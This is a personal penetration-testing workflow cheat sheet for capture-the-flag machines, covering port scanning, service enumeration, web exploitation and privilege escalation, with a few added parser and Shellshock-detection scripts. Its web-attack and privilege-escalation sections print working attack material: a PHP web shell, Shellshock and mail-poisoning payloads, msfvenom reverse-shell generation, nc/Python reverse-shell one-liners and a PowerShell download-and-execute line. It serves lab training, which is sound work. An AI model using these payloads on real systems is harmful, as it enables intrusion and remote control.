Malrawr's Penetration Testing Workflow (CTF)
These notes are currently a work in progress. The goal is to create a complete workflow sheet using all my notes. It may be a little messy at first but I plan to organize it as time goes on.
`7MMM. ,MMF' db `7MMF' `7MM"""Mq. db `7MMF' A `7MF'`7MM"""Mq.
MMMb dPMM ;MM: MM MM `MM. ;MM: `MA ,MA ,V MM `MM.
M YM ,M MM ,V^MM. MM MM ,M9 ,V^MM. VM: ,VVM: ,V MM ,M9
M Mb M' MM ,M `MM MM MMmmdM9 ,M `MM MM. M' MM. M' MMmmdM9
M YM.P' MM AbmmmqMA MM , MM YM. AbmmmqMA `MM A' `MM A' MM YM.
M `YM' MM A' VML MM ,M MM `Mb. A' VML :MM; :MM; MM `Mb.
.JML. `' .JMML..AMA. .AMMA..JMMmmmmMMM .JMML. .JMM..AMA. .AMMA. VF VF .JMML. .JMM.
Initial Scan
Save time and do a full port scan of the machine. This gives you a fully comprehensive overview of the machine. It's really easy to miss something if you do a standard scan, especially in a CTF, which is more puzzle-like. Usually a TCP scan is all you need when doing CTFs, but sometimes it might be wise to do a UDP scan as well.
NMAP
For an in-depth TCP nmap scan you can do something along the lines of:
```
nmap -sC -sV $IP_ADDRESS -p-
```
The `-p-` flag in `nmap` means to scan all ports.
For a UDP scan it's generally better not to scan every port (`--top-ports` takes the number of most common ports to scan, 100 here):
```
nmap -sC -sV -sU -T4 $IP_ADDRESS --top-ports 100
```
The `-T4` flag adjusts the timing template and speeds up the scan.
Using nmap NSE scripts you can also enumerate with scripts that detect vulnerabilities (quote the glob so the shell doesn't expand it against files in your working directory):
```
nmap --script '*vuln*' --script-args=unsafe=1 $IP_ADDRESS -p $PORTS
```
Use this `nmap` scan with caution; it can potentially take down weak services. Generally you shouldn't go all out with it.
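To keep the "go through each port one by one" habit workable after a full `-p-` scan, the following added example (my code, not part of these notes or of nmap) parses nmap's grepable output (`-oG scan.gnmap`) into a per-port checklist that points each open port at the section of these notes that covers it. The `SAMPLE_GNMAP` text is constructed rather than a real scan, and the port-to-section map is an assumption drawn from the headings below.

```python
import re

# Constructed sample of grepable output (nmap -oG); not a real scan.
SAMPLE_GNMAP = """# Nmap 7.70 scan initiated as: nmap -sC -sV -oG scan.gnmap 10.10.10.10 -p-
Host: 10.10.10.10 ()\tStatus: Up
Host: 10.10.10.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.18 ((Ubuntu))/, 139/filtered/tcp//netbios-ssn///, 8080/open/tcp//http-proxy?///\tIgnored State: closed (65531)
# Nmap done at Wed Jan 31 00:58:38 2018 -- 1 IP address (1 host up) scanned
"""

# Assumed mapping from port number to the section of these notes that covers it.
SECTIONS = {
    21: "FTP - 21", 22: "SSH - 22", 25: "SMTP - 25", 53: "DNS - 53",
    69: "TFTP - 69U", 80: "HTTP/HTTPS - 80/443 & Other Ports",
    110: "POP3 - 110", 111: "RPC - 111", 139: "SMB - 139/445",
    161: "SNMP - 161", 443: "HTTP/HTTPS - 80/443 & Other Ports",
    445: "SMB - 139/445",
}

# Grepable host line: "Host: <ip> (<name>)<TAB>Ports: <entries>[<TAB>Ignored State: ...]"
HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\([^)]*\)\s+Ports:\s+(.*?)(?:\t|$)")


def parse_gnmap(text):
    """Return one dict per open port: host, port, proto, service, version.

    Each -oG port entry has the shape port/state/proto/owner/service/rpcinfo/version/.
    """
    results = []
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # comment lines and the "Status: Up" line carry no ports
        host, ports_field = m.group(1), m.group(2)
        for entry in ports_field.split(", "):
            fields = entry.split("/")
            if len(fields) < 7:
                continue  # malformed entry: skip rather than guess
            port, state, proto, _owner, service, _rpc, version = fields[:7]
            if state != "open":
                continue  # closed/filtered ports don't go on the checklist
            results.append({"host": host, "port": int(port), "proto": proto,
                            "service": service, "version": version})
    return results


def checklist(results):
    """One line per open port, pointing at the section of the notes to work through."""
    lines = []
    for r in results:
        section = SECTIONS.get(r["port"], "not in these notes: probe it with curl/amap")
        banner = f"{r['port']}/{r['proto']} {r['service']} {r['version']}".rstrip()
        lines.append(f"{banner} -> {section}")
    return lines


if __name__ == "__main__":
    for line in checklist(parse_gnmap(SAMPLE_GNMAP)):
        print(line)
```

Ports that nmap could only guess (`http-proxy?`, with no version string) still land on the list, which is exactly where the `curl`/`amap` check from the Port Enumeration section belongs.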
Quickfire
One of the downsides of doing a full port scan is the amount of time it takes. To remedy this I've created a wrapper that combines `masscan` and `nmap` together (https://gitlab.com/malrawr/quickfire). This makes it much faster than relying on `nmap` alone. Additionally it can use `amap` to give you more information about each open port that you are dealing with.
Port Enumeration
Always check everything very closely and go through each port one by one. Sometimes ports are tricky, especially HTTP ports. One way to check a port that you're unsure about is to use `curl`. `curl` is normally used for HTTP, but it can be pointed at any port to see what protocol the port asks for. It's particularly helpful for finding those odd HTTP ports quickly.
```
curl $IP_ADDRESS:$PORT
```
Another tool to use is `amap`; it generally gives more detailed information about a port.
```
amap $IP_ADDRESS:$PORT
```
Search everything that you encounter, such as programs and their version numbers. Use either `searchsploit` or Google dorks with `site:exploit-db.com/exploits/`. Using Google dorks instead of searching manually through the Exploit-DB website lets you avoid the website's captcha.
When searching for the version number of an application, be sure to also test the exploits for older versions: even though an exploit may be listed against an older version, other versions can be susceptible to the same vulnerability.
One last important thing to remember is to take advantage of `nmap` NSE scripts. If you find a port that you believe may be vulnerable to something, see if there's an `nmap` NSE script for that. You can find them with `updatedb` and `locate '*.nse'`.
Enumerating Ports with Metasploit
You can use Metasploit to search for auxiliary, exploit, and payload modules by using the `search` command.
```
msf > search port 22

Matching Modules
================

   Name                                                        Disclosure Date  Rank    Description
   ----                                                        ---------------  ----    -----------
   auxiliary/admin/2wire/xslt_password_reset                   2007-08-15       normal  2Wire Cross-Site Request Forgery Password Reset Vulnerability
   auxiliary/admin/android/google_play_store_uxss_xframe_rce                    normal  Android Browser RCE Through Google Play Store XFO
   auxiliary/admin/atg/atg_client                                               normal  Veeder-Root Automatic Tank Gauge (ATG) Administrative Client
   auxiliary/admin/hp/hp_imc_som_create_account                2013-10-08       normal  HP Intelligent Management SOM Account Creation
   auxiliary/admin/http/allegro_rompager_auth_bypass           2014-12-17       normal  Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Authentication Bypass
   auxiliary/admin/http/hp_web_jetadmin_exec                   2004-04-27       normal  HP Web JetAdmin 6.5 Server Arbitrary Command Execution
   auxiliary/admin/http/kaseya_master_admin                    2015-09-23       normal  Kaseya VSA Master Administrator Account Creation
   auxiliary/admin/http/limesurvey_file_download               2015-10-12       normal  Limesurvey Unauthenticated File Download
   auxiliary/admin/http/manageengine_dir_listing               2015-01-28       normal  ManageEngine Multiple Products Arbitrary Directory Listing
   auxiliary/admin/http/manageengine_file_download             2015-01-28       normal  ManageEngine Multiple Products Arbitrary File Download
```
FTP - 21
The first step when finding an FTP server is to see if there's anonymous login. If there is anonymous login, what can you do with it? Enumerate all files if you can.
Whenever there is anonymous upload, always enumerate the files; you may be able to find passwords or system information. Also test whether you can upload files, and if you can, try to see if you can execute them.
- Does the FTP server have a `wwwroot` directory? Is it possible to upload files into this directory?
- Does the FTP server have arbitrary file access? What information can you find?
- What is the OS version?
- What information can you find about other services?
- Can you find any passwords?
Nmap has a number of NSE scripts that may be helpful for enumerating FTP:
```
nmap --script 'ftp*' $IP_ADDRESS -p 21
```
Open OS Filesystem
Sometimes FTP is misconfigured to the point where you can view the entire file system of the machine. Files that tell you the OS version:
- Windows
  - Windows XP: `C:\Windows\System32\eula.txt`
  - Windows 7: `C:\Windows\System32\license.rtf`
- Linux: `cat /etc/lsb-release`, `cat /etc/issue.net`
  - Debian: `cat /etc/debian_version`
  - Red Hat: `cat /etc/redhat-release`
SSH - 22
It's uncommon to find a vulnerability in SSH. Usually the only way of getting in through it is to bruteforce using `hydra`, or if you have found a user and password.
A good way to see if a user exists on SSH is to use SMTP to VRFY users. If the user exists and you found a password somewhere, that could be your ticket in.
SMTP - 25
Use SMTP to verify that a user exists. For example, if you find a user while enumerating another application and want to check that the user exists on the system, you can verify it using SMTP. If that user exists you can try logging in with SSH as the user using a password from the other application.
DNS - 53
- When you see DNS open it probably means that the target is using a different hostname/virtual host. This is further established if visiting the IP address serves a default index page, which indicates DNS misconfiguration.
- Basically, look out for virtual hosts:
  ```
  curl -H 'Host: virtualhost.host' http://127.0.0.1/
  ```
  - You can also add the host to your `/etc/hosts` file.
- You can also use the following commands to map out the target; they show what the IP maps to and the zone name. You can also use the virtual host name/zone name to do it in reverse and see if it maps to an IP address.
  ```
  nslookup
  > server $IP_ADDRESS
  > $IP_ADDRESS
  > $VIRTUAL_HOST_NAME
  ```
- DNS Zone Transfer Records
  - These help you find records. If TCP port 53 is open then you'll be able to request these records and enumerate the machine. Note: the zone name is what you found with `nslookup`.
  ```
  dig axfr @<IP ADDRESS> <ZONE NAME>
  ```
  - This will show you more subdomains used in the DNS zone transfer. You can then add this list to your `/etc/hosts` file so that you can visit them easily without modifying Burp's headers.
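Turning a zone transfer into `/etc/hosts` lines by hand is tedious, so here is an added example (my code, not part of these notes or of dig) that parses `dig axfr` output and emits one hosts line per IP with every name that resolves to it, following in-zone CNAMEs. The `SAMPLE_AXFR` text and the zone `example.htb` are constructed, not real records.

```python
# Constructed sample of `dig axfr @10.10.10.10 example.htb` output; not real data.
SAMPLE_AXFR = """; <<>> DiG 9.11.3 <<>> axfr @10.10.10.10 example.htb
;; global options: +cmd
example.htb.            604800  IN  SOA    ns1.example.htb. admin.example.htb. 3 604800 86400 2419200 604800
example.htb.            604800  IN  NS     ns1.example.htb.
example.htb.            604800  IN  A      10.10.10.10
admin.example.htb.      604800  IN  A      10.10.10.10
ns1.example.htb.        604800  IN  A      10.10.10.10
www.example.htb.        604800  IN  CNAME  example.htb.
dev.example.htb.        604800  IN  A      10.10.10.11
;; Query time: 4 msec
"""


def parse_axfr(text):
    """Split AXFR output into A records {name: ip} and CNAMEs {alias: target}."""
    a_records, cnames = {}, {}
    for line in text.splitlines():
        if not line or line.startswith(";"):
            continue  # dig comments and blank lines
        fields = line.split()
        if len(fields) < 5 or fields[2] != "IN":
            continue  # not a resource record line
        name, rtype, rdata = fields[0].rstrip("."), fields[3], fields[4].rstrip(".")
        if rtype == "A":
            a_records[name] = rdata
        elif rtype == "CNAME":
            cnames[name] = rdata
    return a_records, cnames


def resolve(name, a_records, cnames, depth=8):
    """Follow CNAMEs inside the zone until an A record is reached; give up after `depth` hops."""
    while name in cnames and depth > 0:
        name, depth = cnames[name], depth - 1
    return a_records.get(name)


def hosts_entries(text):
    """Return /etc/hosts lines, one per IP, listing every zone name that resolves to it."""
    a_records, cnames = parse_axfr(text)
    by_ip = {}
    for name in list(a_records) + list(cnames):
        ip = resolve(name, a_records, cnames)
        if ip is None:
            continue  # CNAME pointing outside the zone: nothing local to map
        by_ip.setdefault(ip, set()).add(name)
    return [f"{ip} {' '.join(sorted(names))}" for ip, names in sorted(by_ip.items())]


if __name__ == "__main__":
    print("\n".join(hosts_entries(SAMPLE_AXFR)))
```

Append the printed lines to `/etc/hosts` and every subdomain from the transfer resolves without touching Burp's headers. On the defending side, a server that answers AXFR to anyone is handing out its whole zone; BIND's `allow-transfer` restricts transfers to the secondaries that actually need them.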
HTTP/HTTPS - 80/443 & Other Ports
When visiting websites it's important to find as much information as you can. You have to manually poke around; don't rely on an automated scanner like `nikto` to find things out for you.
Questions to Ask
- Does the source mention anything about a program? Does the source contain any version numbers?
- What language is the server running? PHP? ASP? Etc.
  - This is important for uploading or knowing vulnerabilities.
  - For example, let's say you found a host running FTP and HTTP servers. You also discover that you can upload through FTP and access the file through HTTP. Well, to execute that file it has to be readable by the server.
- What filetypes does the server allow for uploading?
  - Perhaps you can take advantage of this by generating a payload with a specific format:
  ```
  $ msfvenom --help-formats
  Executable formats
      asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war
  Transform formats
      bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript
  ```
- Is there a login page?
  - Have you tried using default credentials?
  - Have you tried using Google to find default credentials for the application and version?
  - It's a good idea to create a custom wordlist with default credentials, so that you can use `hydra` to automate it while you poke around. I talk more about this in the `hydra` section below.
- Does the web application have an admin console? Can you exploit it?
- Does the web application allow uploading?
  - It allows uploading but won't accept my file type?
    - Try checking whether it uploads the file anyway but into a Temp folder.
    - Is there a way to bypass the file check?
    - Try seeing if you can upload a malicious file that it will accept.
  - I uploaded my file but I don't know how to access it?
    - Did you try seeing if you could traverse directories?
    - Perhaps you can try using an LFI to visit the file.
- Does the website use WebDAV?
  - Can you upload into it?
  - Try Cadaver.
  - Check the Webdav section for more information.
Visit Website
- When checking a new site using `burp suite`, try changing the 'Host' field. Instead of the IP, change it to the domain name of the server. This is for virtual host routing: the server will look at the new header and try to see if a different location exists.
- Try using `curl` on pages; they may display something different compared to the 'view source' page in Firefox.
Gather Info
```
whatweb http://127.0.0.1/index.html
```
- It gives you a general idea of the underlying technologies running on a website.
Directory Brute Force
```
dirb http://127.0.0.1 -r -o tmp.dirb
```
- `-r` - disable recursive mode
- `-o` - output to file
- dirbuster
  - Use multiple wordlists:
    - `/usr/share/dirb/wordlists/common.txt`
    - `/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt`
    - `/usr/share/wfuzz/wordlist/general/megabeast.txt`
  - Use common extensions: `/usr/share/wfuzz/wordlist/general/extensions_common.txt`
  - Use the tabs to sort results by response.
Uploading Stuff to Web Applications
- Sometimes a specific file type is required; there are a few ways to bypass this:
  - Magic Bytes
    - These are the first few bytes in a file that say what the file is. You can copy enough from a valid file and then put your malicious string after that. To check whether it's properly concealed you can use the `file` command and see what file it thinks it really is.
  - Add a double extension
    - Let's say it's looking for a `PNG` file; you can do something like `evil.png.php`. The `.png` is just in case the website tries to see if it's valid. You can do variations of this also.
Uploading Web Shells
- Simple web shell:
  ```
  <?if($_GET['cmd']) {system($_GET['cmd']);}?>
  ```
- Microsoft IIS
  - Try both `asp` and `aspx` shells. This mostly depends on the version of IIS that is running.
Wordpress
- Scan with `wpscan` and check out the admin pages to see what you can find:
  ```
  wpscan --url http://10.10.10.10/ --enumerate u
  ```
  or
  ```
  wpscan --url http://10.10.10.10/ --enumerate u --log
  ```
  - `--enumerate u` scans for users.
- Wordlists to use:
  - `/usr/share/seclists/Discovery/Web_Content/CMS/wordpress.fuzz.txt`
  - `/usr/share/seclists/Discovery/Web_Content/CMS/wp_plugins.fuzz.txt`
  - `/usr/share/seclists/Discovery/Web_Content/CMS/wp_themes.fuzz.txt`
Shellshock
- If you find a random `.sh` file in a website directory, test it for Shellshock:
  ```
  curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" $IP/cgi-bin/user.sh
  ```
- CGI-BIN or `.cgi`-using programs like Webmin are usually susceptible to Shellshock.
- In Burp change the `User-Agent` to: `User-Agent: () { :; }; echo hi`
- Some servers react differently to Shellshock; for example Apache will respond immediately but Webmin may not show a response.
  - You can use something like `() { :; }; sleep 10` to see the time it takes to respond. If a server usually responds to a request in 2 seconds, but after using the `sleep` command it takes longer than that, chances are that it is vulnerable.
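Seen from the server side, every probe above leaves the same fingerprint in the access log: a User-Agent (or Referer) that starts with the `() {` function-definition prefix, usually aimed at something under `/cgi-bin/`. The following added example (my code, not part of these notes) runs that detection over a few constructed Apache combined-format log lines, tagging CGI targets and the time-based `sleep` variant, and counts probing clients. The log lines are made up, not from any real server.

```python
import re
from collections import Counter

# Constructed Apache combined-format log lines (not from any real server).
SAMPLE_LOG = """10.0.0.5 - - [31/Jan/2018:00:58:03 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 51 "-" "() { :; }; echo hi"
10.0.0.5 - - [31/Jan/2018:00:58:10 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 51 "-" "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id"
10.0.0.7 - - [31/Jan/2018:00:59:01 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/58.0"
10.0.0.5 - - [31/Jan/2018:00:59:30 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 51 "-" "() { :; }; sleep 10"
10.0.0.9 - - [31/Jan/2018:01:00:00 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 51 "-" "curl/7.58.0"
"""

# Apache "combined" LogFormat: client ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# The function-definition prefix a vulnerable bash parses out of any environment variable.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")
SLEEP_RE = re.compile(r"\bsleep\s+\d+")


def detect_shellshock(log_text):
    """Return one alert dict per request whose User-Agent or Referer carries the () { prefix."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        rec = m.groupdict()
        hit_fields = [f for f in ("agent", "referer") if SHELLSHOCK_RE.search(rec[f])]
        if not hit_fields:
            continue
        tags = ["shellshock-probe"]
        if "/cgi-bin/" in rec["request"] or ".cgi" in rec["request"]:
            tags.append("cgi-target")  # the request hit something bash may be behind
        if any(SLEEP_RE.search(rec[f]) for f in hit_fields):
            tags.append("time-based")  # blind probe: delay instead of visible output
        if rec["status"] == "200":
            tags.append("served-200")  # the script ran; check what it returned
        alerts.append({"client": rec["client"], "time": rec["time"],
                       "request": rec["request"], "fields": hit_fields, "tags": tags})
    return alerts


def sources(alerts):
    """Count alerts per client so the noisiest source stands out."""
    return Counter(a["client"] for a in alerts)


if __name__ == "__main__":
    found = detect_shellshock(SAMPLE_LOG)
    for a in found:
        print(a["time"], a["client"], a["request"], ",".join(a["tags"]))
    print(dict(sources(found)))
```

The combined format only records Referer and User-Agent, so a probe placed in Cookie or a custom header never reaches this log; logging those headers with `%{...}i` in the LogFormat, or inspecting requests before they reach CGI, closes that gap. The fix itself is a patched bash; the log check only tells you who is knocking.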
Directory Bruteforcing Tips
- If you can narrow down a few directories of interest, try narrowing the bruteforcing. You can use a giant wordlist on just one directory in order to enumerate it well.
Proxies
- When going through proxies, try experimenting with the names of the IP addresses in order to gain access, similar to DNS.
- Look out for virtual hosts:
  ```
  curl -H 'Host: virtualhost.host' http://127.0.0.1/
  ```
  - You can also add the host to your `/etc/hosts` file.
Attacking Login Pages
Whenever you're enumerating a webpage you should run `sqlmap` in the background while you poke around. At the same time you can also use
SQLMAP
- Capture the POST request of the login screen and paste it into a new file.
- Use one of the following commands to run it; either one works, and you can press enter for the default options whenever it prompts.
```
sqlmap -r login.req
sqlmap -r login.req --level 5 --risk 3
```
Hydra
Bruteforce all login pages that you see, even though you could just manually put in entries yourself and reload. It's faster to just use Hydra while you do other stuff.
Hydra flags used in the example, from the man pages:
- `-f` - exit when a login/pass pair is found
- `-l` - login with LOGIN name. To use hydra without a username do `-l ""`
- `-P` - load several passwords from FILE
- When bruteforcing pages, you need to specify the plugin used. In this example it is `http-post-form`. There's a difference between `http-post-form` and `https-post-form`; make sure you use the one appropriate to the protocol.
- Use `burp` to capture a POST request to the website.
- Put in the POST request line from `burp`, replacing the user and password with `^USER^` and `^PASS^`.
- After that, append something from the page that appears when a login is not successful; in this case the phrase `is incorrect` appears.
```
root@kali:~/tmp/htb/apocalyst# hydra -f -l falaraki -P list.txt apocalyst.htb http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fapocalyst.htb%2Fwp-admin%2F&testcookie=1:is incorrect"
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-31 00:58:03
[DATA] max 16 tasks per 1 server, overall 16 tasks, 486 login tries (l:1/p:486), ~31 tries per task
[DATA] attacking http-post-form://apocalyst.htb:80//wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fapocalyst.htb%2Fwp-admin%2F&testcookie=1:is incorrect
[80][http-post-form] host: apocalyst.htb   login: falaraki   password: Transclisiation
[STATUS] attack finished for apocalyst.htb (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-31 00:58:38
```
The example above is from a retired HTB machine named Apocalyst.
Default Passwords or Obvious Passwords
- The user/password could be the name of the application or something on the same page.
  - The rationale behind this is that it's something easily findable on the page so that a lazy system administrator remembers it in the future.
  - You can use `cewl` to get an idea of what the password can be.
  - Use the `cewl` output to create a custom wordlist and bruteforce the page with it.
Local File Inclusion (LFI)
- When you find an LFI-vulnerable page, see if it has any passwords listed on it that you can use. Usually the one listed the most is the one that works.
- Check `/etc/fail2ban/fail2ban.conf`
  - This is an application that blocks the use of Hydra and other brute-force tools. If it exists then it means we can't brute-force, so we'll have to input passwords manually.
- `/proc/self/status`
  - You can find the uid and gid of the current user.
  - Use the UID found to see what the user is in the `/etc/passwd` file.
- `/proc/self/environ`
  - If you have access to this file you can modify your User-Agent line to be a PHP command and it will execute on the machine.
- `~/.ssh/id_rsa`
  - Instant private key.
Poisoning Mail
- When connecting to SMTP using telnet, wait for the mail server to respond with its banner.
- Then do the following (the `<--` parts are comments, not input):
  ```
  EHLO hacker.htb
  VRFY target@localhost                           <-- This is the user that the server is running as
  mail from: <SENDER ADDRESS>
  rcpt to: target@localhost
  data
  Subject: <whatever>
  <?php echo system($_REQUEST['evil']); ?>
  .                                               <-- This is to end the message
  ```
- It should then say that the message is queued. Using the LFI, visit the mail file: `../../../var/mail/target%00&evil=whoami`
- You should have achieved command execution.
Webdav
First check how `webdav` works with the server version. It might require a certain trick for uploading to work.
- For example, you generate a msfvenom reverse shell in `asp` format called `evil.txt`.
- After uploading with `curl -T evil.txt http://<IP ADDRESS>/` you then use `cadaver http://<IP ADDRESS>/` in order to rename the file from `evil.txt` to `evil.asp;.txt`.
- This takes advantage of the server's vulnerability.
An example of this process is below:
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP ADDRESS> LPORT=443 -f asp > evil.txt
curl -T evil.txt http://<IP ADDRESS>/
cadaver http://<IP ADDRESS>/
dav:/> copy evil.txt evil.asp;.txt
```
Then you execute the file by visiting it using the browser or `curl`.
TFTP - 69U
Treat TFTP like you do FTP. TFTP is generally more common on Windows machines.
POP3 - 110
RPC - 111
SMB - 139/445
SMB generally releases a lot of information. The quickest way to enumerate this service is by using `enum4linux`.
```
enum4linux -a $IP_ADDRESS
```
Viewing Shares
If a share is found you can view and access it using `smbclient`.
View share names, share types, and comments:
```
smbclient -L $IP_ADDRESS
```
Accessing shares (double quotes so the variables expand):
```
smbclient "//$IP_ADDRESS/$SHARE_NAME"
```
Navigating through SMB shares is similar to FTP. They can also share similar vulnerabilities, such as arbitrary file access.
Common Exploits
Scanning for these vulnerabilities using `nmap` may crash the SMB service.
MS08-067
Check with:
```
nmap --script smb-vuln-ms08-067.nse -p445 $IP_ADDRESS
```
MS17-010
Check with:
```
nmap --script smb-vuln-ms17-010.nse -p445 $IP_ADDRESS
```
SNMP - 161
Simple Network Management Protocol (SNMP) is used for network management. When this is exposed it is possible to retrieve general system information such as hostname and OS version. You can also get information such as open ports and connections (basically `netstat` info) as well as processes and devices in use. Information such as installed software and versions is included as well.
If you see this port open on a machine use `onesixtyone $IP_ADDRESS`, which will reveal OS info.
Also use `snmp-check $IP_ADDRESS`, which reveals everything about a server such as OS version, users, processes, hotfixes, etc.
Alternatively, Metasploit includes Scanner SNMP auxiliary modules that you can select from and enumerate with.
Privilege Escalation
Privilege escalation is the result of actions that allow an attacker to obtain a higher level of permissions on a victim's system or network.
Moving Files From Attacker to Victim
Use Python's SimpleHTTPServer module for transferring files from your computer to your victim.
On Linux machines you can then use `wget` or `curl` to request the files. Alternatively you can use the `-r` recursive flag with `wget` in order to download everything in that web folder at once.
On Windows you can use PowerShell. Assuming you are using PS 3.0 and `wget` is set up as an alias for `Invoke-WebRequest`, you can do something like the following:
```
wget http://10.10.10.10:8080/evilfile.exe -OutFile evilfile.exe
```
Linux System
- List commands that the user can run: `sudo -l`
```
$ sudo -l
Matching Defaults entries for www-data on webbox:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on webbox:
    (scriptworker : scriptworker) NOPASSWD: ALL
```
Basically this lets you run any command as the `scriptworker` user and group without a password, so you can work on any files or binaries/executables owned by `scriptworker`.
Linux Enumeration Scripts
Whenever you have user access inside a box, you should start off with one of the enumeration scripts below and examine the output afterwards. Generally I like working from the `/dev/shm` directory instead of `/tmp`, so I store all my work there.
- LinEnum.sh
  - It has the `-t` flag for thorough checks
- linuxprivchecker.py
- unixprivesc.sh
Resources
- https://www.rebootuser.com/?p=1623
Using a Working Directory
- `/tmp` or `/var/tmp`
  - A good directory for temporary work files
- `/dev/shm`
  - Saves into a ramdisk so that it doesn't get written to the HDD
  - Whenever the server gets rebooted everything is cleared
Spawn a TTY Shell
```
python -c 'import pty; pty.spawn("/bin/sh")'
```
or
```
python -c 'import pty; pty.spawn("/bin/bash")'
```
- This is a simple TTY shell that just has basic functionality.
- https://github.com/infodox/python-pty-shells
  - Here you can find a collection of shells that give full functionality, similar to an SSH shell. The best shell to use is `tcp_pty_backconnect.py`, with `tcp_pty_shell_handler.py` for the handler.
  - One-liner TCP PTY backconnect:
  ```
  python -c 'import os,pty,socket; lhost = "127.0.0.1"; lport = 31337; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); os.putenv("HISTFILE","/dev/null"); pty.spawn("/bin/bash"); s.close();'
  ```
Other Tips - Getting Advanced Terminal Control (Bash Completion, History, and Arrow Usage)
- First get a Python shell; the shell needs this in order to work:
  `python -c 'import pty; pty.spawn("/bin/bash")'`
- Background the terminal with CTRL-Z
- `stty raw -echo`
  - This tells your terminal not to process special characters and instead pass them through to the next terminal, which is the reverse shell we're in.
- Grab the terminal environment info:
  ```
  root@kali:/# echo $TERM
  xterm-256color
  ```
- Bring the terminal back to the foreground using `fg`
- Now you can export your term variable: `export TERM=xterm-256color`
- After completing these steps you should now have proper terminal control
- NOTE: maybe you just need this:
  ```
  CTRL-Z
  stty raw -echo
  fg
  ```
- Reset the terminal with `reset`
  - It'll prompt for the terminal type, so put in `xterm-256color` (the Kali `echo $TERM` value)
- Change the size so that VIM works better
  - On your personal terminal type: `stty size`
  - On the target machine type the numbers you received: `stty rows ## cols ###`
Most Reliable Reverse Shell from Pentest Monkey
```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
```
Misc. Linux
Here are miscellaneous commands.
Finding Deleted Files
- Sometimes you have to look through deleted files on a partition:
  `grep -a '' /dev/sdb`
  - This will show every file on the partition; it's only good for small USBs.
- You can do something like the following if you want to find something specific on a larger partition:
  `grep -a 'password' /dev/sdb`
Windows System
Gaining Reverse Shells
- Unicorn Shell: https://github.com/trustedsec/unicorn
  - It basically lets you set up a quick Meterpreter shell by generating PowerShell shellcode that you can paste into the target's console.
  - It helps to save the output as a `.ps1` file and remotely execute it on the target machine instead of pasting it into the command line.
  ```
  unicorn.py windows/meterpreter/reverse_tcp 10.10.14.2 37337
  msfconsole -r unicorn.rc
  ```
Windows File Transfers
```
powershell "IEX(New-Object Net.WebClient).downloadString('http://127.0.0.1:80/index.html')"
```
- Tells PowerShell to fetch a web page and execute whatever is on that page.
Windows Enumeration with Meterpreter
- `sysinfo` (meterpreter)
  - Look at the OS and architecture
  - What version of Meterpreter are we running? 32 or 64 bit?
- `getuid` (meterpreter)
  - View the current user
Using Post Modules
- `post/multi/recon/local_exploit_suggester`
  - Looks at all KBs applied to that machine and then returns suggestions
  - Note the version of Meterpreter we're running from earlier: 32 bit and 64 bit return different suggestions
  - After it's complete, change the process to a 64 bit one:
    - Run the command `ps`
      - This lists all the processes being run as well as their architecture
      - Look for processes that are x64 and have a value of 1 for the Session column; the 1 means it's interactive, which allows for more permissions
    - `migrate <PID>` migrates the shell to that process
    - Run the module again and note the suggestions; if there are identical matches to the 32 bit version then that exploit has a high chance of working
Windows Enumeration without Meterpreter
- `systeminfo` (cmd.exe)
  - Look for the OS version and the hotfixes
  - If there are no hotfixes applied (it says "N/A") then it'll probably be vulnerable to something, since it has never been updated since it was installed
    - Correlate the age of the OS to the years that exploits came out. For example, if you have a Windows 7 box that has had no updates since it came out in 2009, then the list provided by the Metasploit module may work since it has never been updated.
PowerShell Module - PowerUp
- Mainly looks at privesc through service misconfigurations, not really through patches like the Metasploit module
- Windows Enumeration
  - Scripts
    - https://github.com/joshruppe/winprivesc
    - https://github.com/GDSSecurity/Windows-Exploit-Suggester
    - https://github.com/pentestmonkey/windows-privesc-check
  - Cheat-sheets
    - https://www.joshruppe.com/basic-windows-enumeration
    - http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html